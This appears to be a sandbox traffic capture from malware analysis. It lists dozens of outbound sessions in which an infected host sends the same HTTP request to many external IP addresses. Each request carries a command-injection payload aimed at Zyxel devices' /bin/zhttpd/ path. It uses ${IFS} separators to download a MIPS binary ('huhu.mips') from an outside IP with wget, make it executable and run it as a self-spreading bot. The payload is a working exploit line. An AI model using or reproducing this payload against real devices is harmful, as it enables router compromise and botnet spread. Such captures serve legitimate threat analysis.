                                                Jan 29, 2024 07:07:07.845237017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                267192.168.2.234114091.24.247.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:07.845247030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                268192.168.2.235058298.102.241.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:07.845295906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                269192.168.2.2352390182.204.62.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:07.845377922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                270192.168.2.23536201.74.151.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:07.845423937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                271192.168.2.2334922110.42.172.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:08.851237059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                272192.168.2.234564040.55.211.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:08.851289034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                273192.168.2.2336156161.202.16.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:08.851370096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                274192.168.2.2348886137.31.154.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:08.851430893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                275192.168.2.2349554115.87.234.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:08.851569891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                276192.168.2.2345606115.115.89.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:09.854861021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                277192.168.2.2358616102.3.232.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:09.854887962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                278192.168.2.2360514104.246.72.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:09.854918957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                279192.168.2.233751648.96.166.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:09.854948997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                280192.168.2.2345896202.4.157.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:09.855014086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                281192.168.2.2342414104.231.66.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:09.855027914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                282192.168.2.2346298152.8.137.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:09.855056047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                283192.168.2.235058217.252.206.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:10.857734919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                284192.168.2.2360218165.106.37.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:10.857789993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                285192.168.2.234699813.116.150.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:10.857832909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                286192.168.2.2335296116.173.27.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:10.857841969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                287192.168.2.2343482178.45.174.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:10.857867002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                288192.168.2.2359716164.92.1.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:10.857930899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                289192.168.2.234084886.51.209.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:10.857958078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                290192.168.2.2347444106.135.109.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:10.858007908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                291192.168.2.2347866201.89.73.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:10.858205080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                292192.168.2.234476244.219.132.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:11.861612082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                293192.168.2.2356844136.111.32.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:11.861643076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                294192.168.2.234928676.25.111.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:11.861666918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                295192.168.2.234560081.195.208.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:11.861752033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                296192.168.2.2360006193.215.248.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:11.861752987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                297192.168.2.2346894151.51.227.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:11.861782074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                298192.168.2.2348150159.75.2.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:11.861821890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                299192.168.2.233928493.185.85.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:11.861913919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                300192.168.2.2341152180.109.136.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:11.861962080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                301192.168.2.233680485.86.151.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:12.865662098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                302192.168.2.235348082.9.66.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:12.865710020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                303192.168.2.234733692.239.12.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:12.865761042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                304192.168.2.235142083.192.252.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:12.865761995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                305192.168.2.233505061.212.36.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:12.865813017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                306192.168.2.234885080.67.81.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:12.865875959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                307192.168.2.235405042.108.66.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:12.865941048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                308192.168.2.234054052.46.237.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:12.865982056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                309192.168.2.235272672.210.82.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:12.866022110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                310192.168.2.2340664171.5.105.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:12.866060972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                311192.168.2.2345790192.226.168.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:12.866082907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                312192.168.2.233531442.83.97.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:12.866111040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                313192.168.2.235259093.102.67.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:12.866153002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                314192.168.2.2333116221.193.182.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:12.866183996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                315192.168.2.233968297.205.28.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:12.866367102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                316192.168.2.234504251.218.67.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:13.868973970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                317192.168.2.235018639.118.141.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:13.869002104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                318192.168.2.2359252162.206.120.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:13.869036913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                319192.168.2.2357332139.168.158.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:13.869082928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                320192.168.2.233651234.30.196.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:13.869124889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                321192.168.2.2360762168.118.78.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:13.869160891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                322192.168.2.2345456146.14.134.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:13.869256973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                323192.168.2.235908084.198.176.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:13.869307041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                324192.168.2.2340600141.160.246.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:13.869355917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                325192.168.2.2353354222.45.210.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:14.879412889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                326192.168.2.233976483.154.195.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:14.879470110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                327192.168.2.2347244222.180.47.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:14.879503012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                328192.168.2.234738863.200.6.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:14.879623890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                329192.168.2.2347868209.130.48.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:15.883378029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                330192.168.2.233964069.195.67.144443
                                                TimestampBytes transferredDirectionData
